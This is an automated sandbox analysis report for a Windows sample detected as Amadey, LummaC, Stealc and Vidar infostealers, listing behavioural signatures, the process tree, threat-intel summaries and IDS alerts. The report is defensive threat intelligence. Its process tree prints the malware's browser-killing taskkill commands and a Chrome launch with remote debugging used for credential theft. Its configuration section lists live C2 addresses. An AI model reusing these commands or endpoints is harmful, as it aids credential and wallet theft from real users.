Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1575093
MD5:	986a01646e19832cd4d612c37e1ac75b
SHA1:	c8463240dde522edb3f558e542665734346d5f1b
SHA256:	db29099d060b9ed6c0959e6b13a4b35c6b0893fd1870805c77f05ab6e57eedf2
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Excessive usage of taskkill to terminate processes

Found API chain indicative of sandbox detection

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 986A01646E19832CD4D612C37E1AC75B)

skotes.exe (PID: 5764 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 986A01646E19832CD4D612C37E1AC75B)

skotes.exe (PID: 3688 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 986A01646E19832CD4D612C37E1AC75B)

PK13K1G.exe (PID: 3864 cmdline: "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe" MD5: 15A1CAF203C034ACFF6EB99EB66C5CF9)

conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PK13K1G.exe (PID: 2056 cmdline: "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe" MD5: 15A1CAF203C034ACFF6EB99EB66C5CF9)

8ed1a1ded0.exe (PID: 7072 cmdline: "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe" MD5: 9BA5A9284F9E89843B0D21B2B2027B5E)

taskkill.exe (PID: 5688 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4076 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7048 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 2484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1784 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3408 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 5168 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

acdee533dd.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe" MD5: B355C3C7B4A5F5B7549D18FE732849D6)

chrome.exe (PID: 6120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2296,i,4526499487474445861,3926510125965509157,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

e2def46cb9.exe (PID: 5168 cmdline: "C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe" MD5: 77FF02A2735099E1749EDD45856697EB)

firefox.exe (PID: 5460 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 4128 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 5628 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {117609fd-4f26-4a60-a0be-f2f21ea52b9b} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1323d16ff10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6952 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4212 -parentBuildID 20230927232528 -prefsHandle 4228 -prefMapHandle 4224 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3addc31c-4409-4228-89b4-cd724dc8ae4f} 4128 "\\.\pipe\gecko-crash-server-pipe.4128" 1324d872210 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

8ed1a1ded0.exe (PID: 2476 cmdline: "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe" MD5: 9BA5A9284F9E89843B0D21B2B2027B5E)

taskkill.exe (PID: 3284 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7468 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7628 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7752 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7912 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 8040 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8056 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

8ed1a1ded0.exe (PID: 6464 cmdline: "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe" MD5: 9BA5A9284F9E89843B0D21B2B2027B5E)

taskkill.exe (PID: 7252 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7568 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7668 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7760 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7904 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 8016 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8032 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 3888 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2224 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab10bdd4-e10f-4b35-aab2-8d4644c629cb} 8032 "\\.\pipe\gecko-crash-server-pipe.8032" 2870156eb10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

acdee533dd.exe (PID: 1068 cmdline: "C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe" MD5: B355C3C7B4A5F5B7549D18FE732849D6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["immureprech.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "bellflamre.click", "diffuculttan.xyz", "wrathful-jammy.cyou", "effecterectz.xyz", "debonairnukk.xyz", "deafeninggeh.biz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.1723413141.0000000004B10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001A.00000002.3062381996.0000000000801000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000002.3074070661.000000000133E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1704042533.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000039.00000003.2782806732.0000000004B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001A.00000003.2570885838.00000000051E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000005.00000003.2295922618.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000039.00000002.3139421502.0000000000801000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000039.00000002.3142680354.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 8ed1a1ded0.exe PID: 7072	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: acdee533dd.exe PID: 6828	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: acdee533dd.exe PID: 6828	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: acdee533dd.exe PID: 6828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: acdee533dd.exe PID: 6828	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 8ed1a1ded0.exe PID: 2476	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: 8ed1a1ded0.exe PID: 6464	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.ed0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.f20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 3688, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8ed1a1ded0.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe, ParentProcessId: 6828, ParentProcessName: acdee533dd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 6120, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 3688, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8ed1a1ded0.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:13.470420+0100	2028371	3	Unknown Traffic	192.168.2.4	49771	104.21.67.145	443	TCP
2024-12-14T12:56:16.933316+0100	2028371	3	Unknown Traffic	192.168.2.4	49783	104.21.22.222	443	TCP
2024-12-14T12:56:20.247561+0100	2028371	3	Unknown Traffic	192.168.2.4	49789	104.21.96.1	443	TCP
2024-12-14T12:56:24.940548+0100	2028371	3	Unknown Traffic	192.168.2.4	49804	23.55.153.106	443	TCP
2024-12-14T12:57:01.498248+0100	2028371	3	Unknown Traffic	192.168.2.4	49941	104.21.79.7	443	TCP
2024-12-14T12:57:06.039521+0100	2028371	3	Unknown Traffic	192.168.2.4	49953	23.55.153.106	443	TCP

ET MALWARE Amadey Bot Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:21.192873+0100	2044623	1	A Network Trojan was detected	192.168.2.4	50007	185.215.113.43	80	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:15.391916+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49771	104.21.67.145	443	TCP
2024-12-14T12:56:18.702023+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49783	104.21.22.222	443	TCP
2024-12-14T12:56:21.881846+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49789	104.21.96.1	443	TCP
2024-12-14T12:57:02.213633+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49941	104.21.79.7	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:15.391916+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49771	104.21.67.145	443	TCP
2024-12-14T12:56:18.702023+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49783	104.21.22.222	443	TCP
2024-12-14T12:56:21.881846+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49789	104.21.96.1	443	TCP
2024-12-14T12:57:02.213633+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49941	104.21.79.7	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (bellflamre .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:13.470420+0100	2058213	1	Domain Observed Used for C2 Detected	192.168.2.4	49771	104.21.67.145	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:20.247561+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.4	49789	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:16.933316+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.4	49783	104.21.22.222	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:14.406820+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49772	185.215.113.43	80	TCP
2024-12-14T12:56:21.551360+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49794	185.215.113.43	80	TCP
2024-12-14T12:56:30.046266+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49823	185.215.113.43	80	TCP
2024-12-14T12:56:40.234503+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49853	185.215.113.43	80	TCP
2024-12-14T12:56:53.354136+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49905	185.215.113.43	80	TCP
2024-12-14T12:57:00.174479+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49936	185.215.113.43	80	TCP
2024-12-14T12:57:06.347639+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49956	185.215.113.43	80	TCP
2024-12-14T13:00:24.816012+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50243	185.215.113.43	80	TCP
2024-12-14T13:00:33.318085+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50246	185.215.113.43	80	TCP
2024-12-14T13:00:43.449904+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50248	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:22.840895+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	60752	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:11.925525+0100	2058212	1	Domain Observed Used for C2 Detected	192.168.2.4	59157	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
